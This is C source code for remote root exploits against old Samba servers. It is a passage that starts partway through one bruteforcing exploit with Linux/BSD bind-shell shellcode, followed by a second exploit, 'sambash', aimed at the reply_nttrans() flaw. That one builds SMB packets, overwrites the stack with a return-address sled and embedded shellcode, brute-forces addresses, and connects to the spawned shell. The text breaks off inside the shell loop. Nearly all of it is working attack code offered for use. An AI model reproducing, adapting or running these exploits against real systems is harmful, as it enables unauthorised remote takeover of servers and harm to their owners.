        addr1.sin_port = htons(port);

  addr2.sin_family = AF_INET;

        addr2.sin_port   = htons(45295);

if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { 

fprintf(stderr, "+ connect() error.\n");

return -1;

}

if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type);

if (force == 0) {

if (is_samba(argv[optind], 2) != 0) {

fprintf(stderr, "+ Host is not running samba!\n\n");

return -1;

}

fprintf(stderr, "+ Host is running samba.\n");

}

if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);

if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n");

if (verbose == 1) fprintf(stdout, "+ Session enstablished\n");

sleep(5);

if (targets[type - 1].os_type != 2) {

if (exploit_normal(sock, ret, shellcode) < 0) {

fprintf(stderr, "+ Failed.\n");

close(sock);

}

} else {

                        if (exploit_openbsd32(sock, ret, shellcode) < 0) {

                                fprintf(stderr, "+ Failed.\n");

                                close(sock);

}

}

sleep(2);

if (connectback == 0) {

        if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {

                fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n");

                return -1;

        }

fprintf(stdout, "--------------------------------------------------------------\n");

        shell(sock2);

close(sock);

        close(sock2);

} else {

fprintf(stdout, "+ Done...\n");

close(sock2);

close(sock);

}

return 0;

}

signal(SIGPIPE, SIG_IGN);

signal(SIGUSR1, handler);

switch(brute) {

case 0:

if (ret == 0) ret = 0xc0000000;

shellcode = linux_bindcode;

fprintf(stdout, "+ Bruteforce mode. (Linux)\n");

break;

case 1:

if (ret == 0) ret = 0xbfc00000;

shellcode = bsd_bindcode;

                        fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n");

break;

case 2:

if (ret == 0) ret = 0xdfc00000;

shellcode = bsd_bindcode;

fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n");

break;

case 3:

if (ret == 0) ret = 0x00170000;

shellcode = bsd_bindcode;

fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n");

break;

}

        memcpy(&addr1.sin_addr, he->h_addr, he->h_length);

memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

addr1.sin_family = AF_INET;

        addr1.sin_port   = htons(port);

        addr2.sin_family = AF_INET;

        addr2.sin_port   = htons(45295);

for (i = 0; i < 100; i++)

childs[i] = -1;

i = 0;

        if (force == 0) {

                if (is_samba(argv[optind], 2) != 0) {

                        fprintf(stderr, "+ Host is not running samba!\n\n");

                return -1;

                }

        fprintf(stderr, "+ Host is running samba.\n");

        }

while (OWNED == 0) {

if (sock  > 2) close(sock);

if (sock2 > 2) close(sock2);

                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {

if (verbose == 1) fprintf(stderr, "+ socket() error.\n");

}

else {

ret -= STEPS;

i++;

}

                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)

if (verbose == 1) fprintf(stderr, "+ socket() error.\n");

if ((ret & 0xff) == 0x00 && brute != 3) ret++;

if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret);

usleep(BRUTE_DELAY);

switch (childs[i] = fork()) {

                case 0:

if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {

if (sock  > 2) close(sock);

if (sock2 > 2) close(sock2);

exit(-1);

}

       if(write_timer(sock, 3) == 1) {

if (start_session(sock) < 0) {

if (verbose == 1) fprintf(stderr, "+ Session failed.\n");

if (sock  > 2)close(sock);

if (sock2 > 2) close(sock2);

exit(-1);

}

if (brute == 3) {

                        if (exploit_openbsd32(sock, ret, shellcode) < 0) {

                      if (verbose == 1) fprintf(stderr, "+ Failed.\n");

                                    if (sock  > 2) close(sock);

if (sock2 > 2) close(sock2);

exit(-1);

                                }

} 

else {

    if (exploit_normal(sock, ret, shellcode) < 0) {

                  if (verbose == 1) fprintf(stderr, "+ Failed.\n");

              if (sock  > 2) close(sock);

if (sock2 > 2) close(sock2);

exit(-1);

          }

if (sock > 2) close(sock);

        if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {

if (sock2 > 2) close(sock2);

exit(-1);

}

                               if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {

                                                if (sock2  > 2) close(sock2);

kill(getppid(), SIGUSR1);

}

exit(1);

}

exit(0);

break;

case -1:

                        fprintf(stderr, "+ fork() error\n");

                              exit(-1);

                          break;

                        default:

                        if (i > MAX_CHILDS - 2) {

                                wait(&status);

                                i--;

                                }

                                break;

}

}

}

return 0;

}

/* EOF */

/**

 **   sambash -- samba <= 2.2.7a reply_nttrans() linux x86 remote root exploit by flatline@blackhat.nl

 **

 **   since we fully control a memcpy(), our options are endless here. i've chosen to go the stack route tho,

 **   because any heap method would've required too much brute forcing or would've required the ugly use of targets.

 **

 **   the stack method still requires little brute forcing and obviously will not survive PaX, but it's efficient.

 **   i'm using executable rets as a 'jmp sled' which jmp to the shellcode to help improve our brute forcing chances a bit.

 **

 **   shouts to (#)0dd, #!l33tsecurity and #!xpc.

 **

 **   many thanks to tcpdump which had to suffer the torture i put it through and often didn't survive (more to come?).

 **

 **   public/private, i don't give a shit.

 **

 **/

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <netdb.h>

#include <errno.h>

#include <string.h>

#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

#include <ctype.h>

#include <signal.h>

typedef unsigned char uint8;

typedef unsigned short uint16;

typedef unsigned long uint32;

/* http://ubiqx.org/cifs/SMB.html, CIFS-TR-1p00_FINAL.pdf, smb_cifs_protocol.pdf, 

http://www.ubiqx.org/cifs/rfc-draft/rfc1001.html#s14, http://www.ubiqx.org/cifs/rfc-draft/rfc1002.html#s4.3.2 */

// XXX: lelijkheid: vermijd word padding door hier byte arrays van te maken.

struct variable_data_header

{ uint8 wordcount, bytecount[2];

};

struct nbt_session_header

{ uint8 type, flags, len[2];

};

struct smb_base_header

{ uint8 protocol[4], command, errorclass, reserved, errorcode[2];

  uint8 flags;

  uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2];

};

struct negprot_reply_header

{ uint8 wordcount;

  uint8 dialectindex[2];

  uint8 securitymode;

  uint16 maxmpxcount, maxvccount;

  uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow, timehigh;

  uint16 timezone;

  uint8 keylen;

  uint16 bytecount;

};

// omdat we ipasswdlen en passwdlen meegeven is wordcount altijd 13 voor deze header.

struct sesssetupx_request_header

{ uint8 wordcount, command, reserved;

  uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2];

  uint8 sessionid[4];

  uint8 ipasswdlen[2], passwdlen[2];

  uint8 reserved2[4], capabilities[4];

};

struct sesssetupx_reply_header

{ uint8 wordcount, xcommand, xreserved, xoffset[2], action[2], bytecount[2];

  // wat volgt: char nativeos[], nativelanman[], primarydomain[];

};

struct tconx_request_header

{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];

  // uint16 bytecount geeft lengte van volgende fields aan: char password[], path[], service[];

};

struct tconx_reply_header

{ uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2], bytecount[2];

  // wat volgt: char service[], char nativefilesystem[];

};

// verschilt van trans en trans2 door de 32 bits wijde header fields.

struct nttrans_primary_request_header

{ uint8 wordcount, maxsetupcount, flags[2], totalparamcount[4], totaldatacount[4], maxparamcount[4], maxdatacount[4];

  uint8 paramcount[4], paramoffset[4], datacount[4], dataoffset[4], setupcount, function[2], bytecount[2];

};

struct nttrans_secondary_request_header

{ uint8 pad[4], totalparamcount[4], totaldatacount[4], paramcount[4], paramoffset[4], paramdisplace[4],

    datacount[4], dataoffset[4], datadisplace[4];

};

/* struct trans2_request_header

{ uint8 wordcount;

  int totalparamcount, totaldatacount, maxparamcount, maxdatacount;

  uint8 maxsetupcount[2], flags[2];

  uint8 timeout[4];

  int reserved2, paramcount, paramoffset, datacount, dataoffset, fid;

  uint8 setupcount[2], bytecount[2];

}; */

struct trans2_reply_header

{ uint8 wordcount;

  uint16 totalparamcount, totaldatacount, reserved, paramcount, paramoffset, 

    paramdisplacement, datacount, dataoffset, datadisplacement;

  uint8 setupcount, reserved2;

  uint16 bytecount;

};

#define SMBD_PORT 139

#define SHELLCODE_PORT 5074

#define SMB_NEGPROT 0x72

#define SMB_SESSSETUPX 0x73

#define SMB_TCONX 0x75

#define SMB_TRANS2 0x32

#define SMB_NTTRANS1 0xA0

#define SMB_NTTRANS2 0xA1

#define SMB_NTTRANSCREATE 0x01

#define SMB_TRANS2OPEN 0x00

#define SMB_SESSIONREQ 0x81

#define SMB_SESSION 0x00

#define STACKBOTTOM 0xbfffffff

#define STACKBASE 0xbfffd000

#define TOTALCOUNT ((int)(STACKBOTTOM - STACKBASE))

#define BRUTESTEP 5120

extern char *optarg;

extern int optind, errno, h_errno;

uint16 tid, pid, uid;

uint32 sessionid, PARAMBASE = 0x81c0000;

char *tconx_servername;

int userbreak = 0;

char shellcode[] = "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52" \

  "\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd" \

  "\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43" \

  "\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52" \

  "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b"

  "\xcd\x80";

// ach, 't kan ermee door.

char *netbios_encode_name(char *name, int type)

{ char plainname[16], c, *encoded, *ptr;

  int i, len = strlen(name);

  if ((encoded = malloc(34)) == NULL)

  { fprintf(stderr, "malloc() failed\n");

    exit(-1);

  }

  ptr = encoded;

  strncpy(plainname, name, 15);

  *ptr++ = 0x20;

  for (i = 0; i < 16; i++)

  { if (i == 15) c = type;

    else 

    { if (i < len) c = toupper(plainname[i]);

      else c = 0x20;

    }

    *ptr++ = (((c >> 4) & 0xf) + 0x41);

    *ptr++ = ((c & 0xf) + 0x41);

  }

  *ptr = '\0';

  return encoded;

}

void construct_nbt_session_header(char *ptr, uint8 type, uint8 flags, uint32 len)

{ struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr;

  uint16 nlen;

// geen idee of dit de juiste manier is, maar 't lijkt wel te werken ..

  if (len > 65535) nlen = 65535;

  else nlen = htons(len);

  memset((void *)nbt_hdr, '\0', sizeof (struct nbt_session_header));

  nbt_hdr->type = type;

  nbt_hdr->flags = flags;

  memcpy(&nbt_hdr->len, &nlen, sizeof (uint16));

}

// caller zorgt voor juiste waarde van ptr.

void construct_smb_base_header(char *ptr, uint8 command, uint8 flags, uint16 flags2, uint16 tid, uint16 pid, 

  uint16 uid, uint16 mid)

{ struct smb_base_header *base_hdr = (struct smb_base_header *)ptr;

  memset(base_hdr, '\0', sizeof (struct smb_base_header));

  memcpy(base_hdr->protocol, "\xffSMB", 4);

  base_hdr->command = command;

  base_hdr->flags = flags;

  memcpy(&base_hdr->flags2, &flags2, sizeof (uint16));

  memcpy(&base_hdr->tid, &tid, sizeof (uint16));

  memcpy(&base_hdr->pid, &pid, sizeof (uint16));

  memcpy(&base_hdr->uid, &uid, sizeof (uint16));

  memcpy(base_hdr->mid, &mid, sizeof (uint16));

}

void construct_sesssetupx_header(char *ptr)

{ struct sesssetupx_request_header *sx_hdr = (struct sesssetupx_request_header *)ptr;

  uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen = 0;

  uint32 capabilities = 0x50;

  memset(sx_hdr, '\0', sizeof (struct sesssetupx_request_header));

  sx_hdr->wordcount = 13;

  sx_hdr->command = 0xff;

  memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16));

  memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16));

  memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16));

  memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32));

  memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16));

  memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16));

  memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32));

}

/*

struct tconx_request_header

{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];

  -- uint16 bytecount geeft lengte van volgende fields aan: char password[], path[], service[];

}; */

void construct_tconx_header(char *ptr)

{ struct tconx_request_header *tx_hdr = (struct tconx_request_header *)ptr;

  uint16 passwdlen = 1, bytecount;

  char *data;

  memset(tx_hdr, '\0', sizeof (struct tconx_request_header));

  bytecount = strlen(tconx_servername) + 15;  

  if ((data = malloc(bytecount)) == NULL)

  { fprintf(stderr, "malloc() failed, aborting!\n");

    exit(-1);

  }

  memcpy(data, "\x00\x5c\x5c", 3);

  memcpy(data + 3, tconx_servername, strlen(tconx_servername));

  memcpy(data + 3 + strlen(tconx_servername), "\x5cIPC\x24\x00\x3f\x3f\x3f\x3f\x3f\x00", 12);

  tx_hdr->wordcount = 4;

  tx_hdr->xcommand = 0xff;

  memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16));

  memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16));

// zorg ervoor dat er genoeg ruimte in het packet is om dit erachter te kunnen plakken.

  memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount);

}

// session request versturen.

void nbt_session_request(int fd, char *clientname, char *servername)

{ char *cn, *sn;

  char packet[sizeof (struct nbt_session_header) + (34 * 2)];

  construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet) - sizeof (struct nbt_session_header));

  tconx_servername = servername;

  sn = netbios_encode_name(servername, 0x20);

  cn = netbios_encode_name(clientname, 0x00);

  memcpy(packet + sizeof (struct nbt_session_header), sn, 34);

  memcpy(packet + (sizeof (struct nbt_session_header) + 34), cn, 34);

  if (write(fd, packet, sizeof (packet)) == -1)

  { close(fd);

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  free(cn);

  free(sn);

}

// netjes verwerken, zoals het hoort.

void process_nbt_session_reply(int fd)

{ struct nbt_session_header nbt_hdr;

  char *errormsg;

  uint8 errorcode;

  int size, len = 0;

  if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1)

  { close(fd);

    fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  if (size != sizeof (nbt_hdr))

  { close(fd);

    fprintf(stderr, "read() a broken packet, aborting.\n"); 

    exit(-1);

  }

  memcpy(&len, &nbt_hdr.len, sizeof (uint16));

  if (len)

  { read(fd, (void *)&errorcode, 1); 

    close(fd);

    switch (errorcode)

    { case 0x80 : errormsg = "Not listening on called name"; break;

      case 0x81 : errormsg = "Not listening for calling name"; break;

      case 0x82 : errormsg = "Called name not present"; break;

      case 0x83 : errormsg = "Called name present, but insufficient resources"; break;

      case 0x8f : errormsg = "Unspecified error"; break;

      default : errormsg = "Unspecified error (unknown error code received!)"; break;

    }

    fprintf(stderr, "session request denied, reason: '%s' (code %i)\n", errormsg, errorcode);

    exit(-1);

  }

  printf("session request granted\n");

}

void negprot_request(int fd)

{ struct variable_data_header data;

  char dialects[] = "\x2PC NETWORK PROGRAM 1.0\x0\x2MICROSOFT NETWORKS 1.03\x0\x2MICROSOFT NETWORKS 3.0\x0\x2LANMAN1.0\x0" \

    "\x2LM1.2X002\x0\x2Samba\x0\x2NT LANMAN 1.0\x0\x2NT LM 0.12\x0\x2""FLATLINE'S KWAADWAAR";  

  char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data) + sizeof (dialects)];

  int dlen = htons(sizeof (dialects));

  memset(&data, '\0', sizeof (data));

  construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));

  pid = getpid();

  construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NEGPROT, 8, 1, 0, pid, 0, 1);

  memcpy(&data.bytecount, &dlen, sizeof (uint16));

  memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)), &data, sizeof (data));

  memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data)), 

    dialects, sizeof (dialects));

  if (write(fd, packet, sizeof (packet)) == -1)

  { close(fd);

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

}

void process_negprot_reply(int fd)

{ struct nbt_session_header *nbt_hdr;

  struct smb_base_header *base_hdr;

  struct negprot_reply_header *np_reply_hdr;

  char packet[1024];

  int size;

  uint16 pid_reply;

  nbt_hdr = (struct nbt_session_header *)packet;

  base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));

  np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct nbt_session_header) + 

    sizeof (struct smb_base_header)));

  if ((size = read(fd, packet, sizeof (packet))) == -1)

  { close(fd);

    fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  // bekijk het antwoord even vluchtig.

  memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16));

  memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32));

  if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 || pid_reply != pid)

  { close(fd);

    fprintf(stderr, "protocol negotiation failed\n");

    exit(-1);

  }

  printf("protocol negotiation complete\n");

}

void sesssetupx_request(int fd)

{ uint8 data[] = "\x12\x0\x0\x0\x55\x6e\x69\x78\x00\x53\x61\x6d\x62\x61";

  char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + 

    sizeof (struct sesssetupx_request_header) + sizeof (data)];

  int size;

  construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));

  construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1);

  construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

  memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + 

    sizeof (struct sesssetupx_request_header), &data, sizeof (data));

  if ((size = write(fd, packet, sizeof (packet))) == -1)

  { close(fd);

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  if (size != sizeof (packet))

  { close(fd);

    fprintf(stderr, "couldn't write entire packet, aborting!\n");

    exit(-1);

  }

}

void process_sesssetupx_reply(int fd)

{ struct nbt_session_header *nbt_hdr;

  struct smb_base_header *base_hdr;

  struct sesssetupx_reply_header *sx_hdr;

  char packet[1024];

  int size, len;

// lees het packet

  if ((size = read(fd, packet, sizeof (packet))) == -1)

  { close(fd);

    fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  nbt_hdr = (struct nbt_session_header *)packet;

  base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));

  sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

  memcpy(&len, &nbt_hdr->len, sizeof (uint16));

  memcpy(&uid, &base_hdr->uid, sizeof (uint16));

// even een vluchtige check

  if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3)

  { close(fd);

    fprintf(stderr, "session setup failed\n");

    exit(-1);

  }

  printf("session setup complete, got assigned uid %i\n", uid);

}

void tconx_request(int fd)

{ // geen fixed size buffer omdat we met dynamische data te maken hebben (variabele servernaam)

  char *packet;

  int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +

    sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15;

  if ((packet = malloc(pktsize)) == NULL)

  { close(fd);

    fprintf(stderr, "malloc() failed, aborting!\n");

    exit(-1);

  }

  construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct nbt_session_header));

  construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_TCONX, 8, 1, 0, pid, uid, 1);

  construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

  if ((size = write(fd, packet, pktsize)) == -1)

  { close(fd);

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  free(packet);

  if (size != pktsize)

  { close(fd);

    fprintf(stderr, "couldn't write entire packet, aborting!\n");

    exit(-1);

  }  

}

void process_tconx_reply(int fd)

{ struct nbt_session_header *nbt_hdr;

  struct smb_base_header *base_hdr;

  struct tconx_reply_header *tx_hdr;

  char packet[1024];

  int size, bytecount;

// lees het packet

  if ((size = read(fd, packet, sizeof (packet))) == -1)

  { close(fd);

    fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno);

    exit(-errno);

  }

  nbt_hdr = (struct nbt_session_header *)packet;

  base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));

  tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

  memcpy(&tid, &base_hdr->tid, sizeof (uint16));

  memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16));

  printf("tree connect complete, got assigned tid %i\n", tid);

}

void nttrans_primary_request(int fd)

{ char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + 

    sizeof (struct nttrans_primary_request_header)];

  struct nttrans_primary_request_header nt_hdr;

  int size, function = SMB_NTTRANSCREATE, totalparamcount = TOTALCOUNT, totaldatacount = 0;

  uint8 setupcount = 0;

  memset(&nt_hdr, '\0', sizeof (nt_hdr));

  construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));

  construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS1, 8, 1, tid, pid, uid, 1);

  nt_hdr.wordcount = 19 + setupcount;

  memcpy(&nt_hdr.function, &function, sizeof (uint16));

  memcpy(&nt_hdr.totalparamcount, &totalparamcount, sizeof (uint32));

  memcpy(&nt_hdr.totaldatacount, &totaldatacount, sizeof (uint32));

  memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nt_hdr, sizeof (nt_hdr));

  if ((size = write(fd, packet, sizeof (packet))) == -1)

  { close(fd);

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  if (size != sizeof (packet))

  { close(fd);

    fprintf(stderr, "couldn't write entire packet, aborting!\n");

    exit(-1);

  }  

}

// hier gaat het gebeuren.

/* 

struct nttrans_secondary_request_header

{ uint8 pad[3], totalparamcount[4], totaldatacount[4], paramcount[4], paramoffset[4], paramdisplace[4],

    datacount[4], dataoffset[4], datadisplace[4];

}; */

void nttrans_secondary_request(int fd)

{ char retbuf[TOTALCOUNT], packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +

    sizeof (struct nttrans_secondary_request_header) + TOTALCOUNT];

  struct nttrans_secondary_request_header nt_hdr;

  unsigned long retaddr, jmptocode = 0x9090a1eb; // jmptocode = 0x90909ceb;

  int i;

  int size, totalparamcount = TOTALCOUNT, totaldatacount = 0,   

    paramcount = TOTALCOUNT, datacount = 0, paramdisplace = STACKBASE - PARAMBASE,

    datadisplace = 0, paramoffset = 68, dataoffset = 0;

  memset(&nt_hdr, '\0', sizeof (nt_hdr));

  retaddr = 0xbffff6eb;

  for (i = 0; i < TOTALCOUNT; i += 4) 

  { if (i == 0x100)

    { memcpy(retbuf + i, &jmptocode, 4);

    }

    else memcpy(retbuf + i, &retaddr, 4);

  }

//  memset(shellcode, 0xCC, sizeof (shellcode));

  memcpy(retbuf + 0x100 - sizeof (shellcode), shellcode, sizeof (shellcode));

  printf("sizeof packet: %i, parambase: 0x%08lx\n", sizeof (packet), PARAMBASE);

  construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));

  construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS2, 8, 1, tid, pid, uid, 1);

  memcpy(&nt_hdr.totalparamcount, &totalparamcount, sizeof (uint32));

  memcpy(&nt_hdr.totaldatacount, &totaldatacount, sizeof (uint32));

  memcpy(&nt_hdr.paramcount, &paramcount, sizeof (uint32));

  memcpy(&nt_hdr.datacount, &datacount, sizeof (uint32));

  memcpy(&nt_hdr.paramdisplace, &paramdisplace, sizeof (uint32));

  memcpy(&nt_hdr.datadisplace, &datadisplace, sizeof (uint32));

  memcpy(&nt_hdr.paramoffset, &paramoffset, sizeof (uint32));

  memcpy(&nt_hdr.dataoffset, &dataoffset, sizeof (uint32));

  memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nt_hdr, sizeof (nt_hdr));

  memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (nt_hdr), retbuf, sizeof (retbuf));

  usleep(5000);

  if ((size = write(fd, packet, sizeof (packet))) == -1)

  { close(fd);  

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno);

    exit(-errno);

  }

  if (size != sizeof (packet))

  { close(fd);

    fprintf(stderr, "couldn't write entire packet, aborting!\n");

    exit(-1);

  }

  fprintf(stderr, "secondary nttrans packet sent!\n");

}

// voor alle idioten onder ons.

void usage(char *name)

{ printf("\nusage: %s -h hostname [-p port] -t target [-l]\n\n-h\tspecify target hostname\n-p\tspecify target " \

   "port (defaults to 139)\n-t\tspecify target's magic numbers\n-l\tshow list of targets\n\n", name);

}

void userbreak_handler(int x)

{ userbreak = 1;

}

int main(int argc, char **argv)

{ int fd, port = -1, opt, readlen;

  unsigned long target_ip;

  struct sockaddr_in s_in;

  struct hostent *he;

  char *host = NULL, *me, readbuf[4096];

  fd_set readfds;

  if (argc >= 1) 

  { me = argv[0];

    if (strchr(me, '/') != NULL) me = strrchr(me, '/') + 1;

  }

  else me = "sambash";

  fprintf(stderr, "\nsambash -- samba <= 2.2.7a reply_nttrans() linux x86 remote root exploit by flatline@blackhat.nl\n\n");

  while ((opt = getopt(argc, argv, "h:p:b:")) != EOF)

  { switch (opt)

    { case 'h': { if (!inet_aton(optarg, (struct in_addr *)&target_ip))

 { if ((he = gethostbyname(optarg)) == NULL)

   { fprintf(stderr, "unable to resolve host '%s', reason: %s (code %i)\n", optarg, hstrerror(h_errno), h_errno);

     exit(-h_errno);

   }

   memcpy((void *)&target_ip, he->h_addr_list[0], he->h_length);

         }

 host = optarg;

} break;

      case 'p': { port = atoi(optarg);

         if (port < 0 || port > 65535)

 { fprintf(stderr, "invalid port specified.\n");

   exit(-1);

 }

  } break;

      case 'b': PARAMBASE += atoi(optarg); break;

      default : { usage(me);

 exit(0);

} break;

    }

  }

  if (host == NULL)

  { fprintf(stderr, "no hostname specified.\n");

    usage(me);

    exit(-1);

  }

  if (port == -1) port = SMBD_PORT;

  signal(SIGINT, userbreak_handler);

  while (!userbreak)

  { memset(&s_in, 0, sizeof (s_in));

    s_in.sin_family = AF_INET;

    s_in.sin_port = htons(port);

    s_in.sin_addr.s_addr = target_ip;

    if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)

    { fprintf(stderr, "socket() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

      exit(-errno);

    }

    if (connect(fd, (struct sockaddr *)&s_in, sizeof (s_in)) == -1)

    { fprintf(stderr, "connect() to host '%s:%i' failed, reason: '%s' (code %i)\n", host, port, strerror(errno), errno); 

      exit(-errno);

    }

    // register name

    nbt_session_request(fd, "BOSSA", "SAMBA");

    process_nbt_session_reply(fd);

    // protocol negotiation

    negprot_request(fd);

    process_negprot_reply(fd);

    // session setup

    sesssetupx_request(fd);

    process_sesssetupx_reply(fd);

    // tree connection setup

    tconx_request(fd);

    process_tconx_reply(fd);

    // nttrans packet sturen

    nttrans_primary_request(fd);

    nttrans_secondary_request(fd);

    usleep(750000);

    if (close(fd) == -1)

    { fprintf(stderr, "close() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

      exit(-errno);

    }

    memset(&s_in, 0, sizeof (s_in));

    s_in.sin_family = AF_INET;

    s_in.sin_port = htons(SHELLCODE_PORT);

    s_in.sin_addr.s_addr = target_ip;

    if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)

    { fprintf(stderr, "socket() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

      exit(-errno);

    }

    if (connect(fd, (struct sockaddr *)&s_in, sizeof (s_in)) == -1)

    { if (close(fd) == -1)

      { fprintf(stderr, "close() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

        exit(-errno);

      }

      PARAMBASE += BRUTESTEP;

      continue;

    }

    printf("\n\n** veel plezier.\n\n");

    FD_ZERO(&readfds);

    while (!userbreak)

    { FD_SET(fileno(stdin), &readfds);

      FD_SET(fd, &readfds);

      if (select(fd + 1, &readfds, NULL, NULL, NULL) < 0)

      { fprintf(stderr, "shell loop aborted because of error code %i ('%s')\n", errno, strerror(errno));

        break;

      }

      if (FD_ISSET(fileno(stdin), &readfds))

      { int writelen;

        readlen = read(fileno(stdin), readbuf, sizeof (readbuf));

        if (readlen == -1)

        { fprintf(stderr, "read() failed with error code %i ('%s')\n", errno, strerror(errno));

          exit(-1);

        }

